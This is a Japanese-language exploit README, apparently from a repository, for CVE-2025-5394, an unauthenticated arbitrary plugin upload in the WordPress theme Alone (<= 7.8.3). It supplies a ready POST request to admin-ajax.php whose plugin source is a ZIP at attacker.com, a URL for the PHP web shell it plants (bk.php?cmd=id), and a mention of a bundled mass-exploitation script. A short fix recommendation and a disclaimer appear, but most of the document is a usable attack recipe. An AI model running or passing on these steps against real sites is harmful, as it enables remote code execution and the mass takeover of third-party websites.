
Alone – チャリティ・多目的・非営利向けWordPressテーマ <= 7.8.3 - プラグインインストールを介した認証欠如による未認証の任意ファイルアップロード
🔥 脆弱性概要
WordPress テーマ Alone のバージョン <= 7.8.3 には、未認証の任意ファイルアップロード の脆弱性があります。この欠陥により、未認証の攻撃者 が保護されていない AJAX エンドポイントを介してリモート URL から任意のプラグイン ZIP ファイルをアップロード・インストールできるようになり、バックドア化されたプラグインを展開することで リモートコード実行(RCE) につながります。
この脆弱性は、認証や権限チェックなしに wp_ajax_nopriv_ を介して公開されている beplus_import_pack_install_plugin 関数に起因します。この関数は、ユーザーが指定した URL からプラグインをインストールして有効化します。
🔍 影響を受けるテーマ
🧪 エクスプロイトの特徴
/wp-admin/admin-ajax.php?action=beplus_import_pack_install_plugin🧠 研究者
🚀 使用方法
管理下のサーバーにホストした悪意のあるプラグイン ZIP ファイルを用意します。
Plugin Name:)と PHP バックドア(例: bk.php)を含める必要があります。以下の POST リクエストを作成します:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded
action=beplus_import_pack_install_plugin&
data[plugin_slug]=hello-dolly&
data[plugin_source]=https://attacker.com/hello-dolly.zip
成功すると、プラグインがインストール・有効化されます。以下の場所でシェルにアクセスします:
https://victim.com/wp-content/plugins/hello-dolly/bk.php?cmd=id
🧰 一括エクスプロイトスクリプト このリポジトリには、以下の機能を備えた一括エクスプロイトツールが含まれています:
result.txt へのリアルタイムログ記録詳細は mass_beplus_exploit.py を参照してください。
🛠 修正の推奨事項
wp_ajax_nopriv_beplus_import_pack_install_plugin フックを削除または保護する必要があります。current_user_can('install_plugins'))🔒 免責事項:
この情報は、教育目的および許可されたセキュリティテストの目的でのみ提供されます。コンピュータシステムへの不正アクセスまたは不正使用は違法かつ非倫理的です。
📚 リファレンス:
CVE: CVE-2025-5394
研究者: Thai An